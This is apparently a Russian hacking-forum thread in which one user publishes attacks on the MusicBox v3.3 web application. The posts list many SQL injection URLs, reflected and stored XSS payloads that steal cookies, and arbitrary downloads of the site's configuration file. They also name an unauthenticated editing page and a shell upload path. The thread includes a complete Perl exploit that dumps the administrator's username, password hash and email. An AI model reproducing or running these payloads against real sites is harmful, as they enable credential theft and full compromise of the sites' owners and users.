MusicBox v3.3
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
MusicBox v3.3 - 2010-03-31 19:17:02.856666
|
|
|
Ctacok
Сообщений: 38
Оценки: 0
Присоединился: 2009-05-10 13:55:58.663333
|
SQL Injection:
/blogs.php?action=edit&newsid=-1+union+select+concat_ws(0x3a,user(),database(),version())+–+
/genre_artists.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7+–+
Пассивная XSS:
/index.php?in=artist&term=%22%3E%3Csсriрt%3Ealert(document.cookie);%3C/sсriрt%3EE&action=search&start=0&x=0&y=0
/index.php?action=top&show=5&type=Artists+order+by+1+–+%22%3E%3Csсriрt%3Ealert(document.cookie);%3C/sсriрt%3E
Активная XSS:
/member.php?uname=кому будем посылать XSS, в комменты <sсriрt>alert(document.cookie);</sсriрt>
По идеи почти каждый параметр уязвим, но охото спать и я пошёл дрыхнуть :o
Сплойт писать не стал, права юзера нужны)
Завтра утром мб накалякаю.
Ах да, /phpinfo.php ;)
|
|
|
|
|
RE: MusicBox v3.3 - 2010-04-20 12:23:03.270000
|
|
|
Ctacok
Сообщений: 38
Оценки: 0
Присоединился: 2009-05-10 13:55:58.663333
|
Сплойтенг.
http://pastebin.com/HDBXNHbe
#!/usr/bin/perl
use LWP::Simple;
print "\n";
print "##############################################################\n";
print "# MusicBox v 3.3 SQL INJECTION EXPLOIT #\n";
print "# Author: Ctacok (Russian) #\n";
print "# Special for Antichat (forum.antichat.ru) and xakep.ru #\n";
print "##############################################################\n";
print "\n Usage: exploit.pl [host] [path] ";
print "\n EX : exploit.pl www.localhost.com /path/ \n\n";
print "\n userlevel 9 = SuperAdmin ";
print "\n pass = md5($pass)";
if (@ARGV < 2)
{
exit;
}
$host=$ARGV[0];
$path=$ARGV[1];
$vuln = "-1+union+select+1,2,concat(0x3a3a3a,userid,0x3a,username,0x3a,password,0x3a,email,0x3a,userlevel,0x3a3a3a),4,5,6,7+from+users+";
$doc = get($host.$path."genre_artists.php?id=".$vuln."--+&by=ASC");
if ($doc =~ /:::(.+):(.+):(.+):(.+):(.+):::/){
print "\n[+] Admin id: : $1";
print "\n[+] Admin username: $2";
print "\n[+] Admin password: $3";
print "\n[+] Admin email: $4";
print "\n[+] Admin userlevel: $5";
}else{
print "\n My name is Fail, Epic Fail... \n"
}
|
|
|
|
|
RE: MusicBox v3.3 - 2010-04-21 13:57:02.636666
|
|
|
Ctacok
Сообщений: 38
Оценки: 0
Присоединился: 2009-05-10 13:55:58.663333
|
/news.php?action=edit&newsid=-1+union+select+1,2,3,4,5+–+
/album.php?eid=-1+union+select+1,2,3,4,5,6,7,8,9,10+–+
/blog-detail.php?id=-1+union+select+1,2,3,4,5+–+
/genre_albums.php?id=-1+or(1,1)=(select+count(0),concat((select+database()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)–+
/news-detail.php?id=-1+union+select+1,2,3,4,5+–+
/songs.php?eid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+–+
Need mq off:
/images.php?type=album&aid=-1'+union+select+version()+–+
(<img src=5.0.45-community-nt>)
/download_songs.php?song=-1%22%3E%3Csсriрt%3Ealert();%3C/sсriрt%3E // Хотя это скуля, ну крутить я нехочу)
/mygpic.php?picname=%3C/title%3E%3Csсriрt%3Ealert();%3C/sсriрt%3E
/news-detail.php?id=%22%3E%3Csсriрt%3Ealert();%3C/sсriрt%3E
Need Register_globals:
/directlinking.php?count=1&filename=%22%3E%3Csсriрt%3Ealert();%3C/sсriрt%3E
Скачиваем любой файл:
/forcedownload.php?file=sources/configure.php – Качаем
/forcedownload.php?file=sources/configure.php%00 – Смотрим в браузере
/streamm3u.php?file=sources/configure.php – Скачается в формате m3u ;)
Раскрытие:
/opendir.php
"Мы разработчики MusicBox, и мы дураки, взяли блин не поставили проверку на авторизацию, или мы не дураки и оставили эти баги для траффа для хекеров, кароче какую песню хотите такую и редактируйте!"
/songs.php?eid=1
Льём шелл:
/up.php – помоему баян, видел где-то :) По дефолту в /audio/ – На офф сайте стадо баранов уже видать в теме что залиться через этот файл можно, так что делетнут он там :)
|
|
|
|
|
|
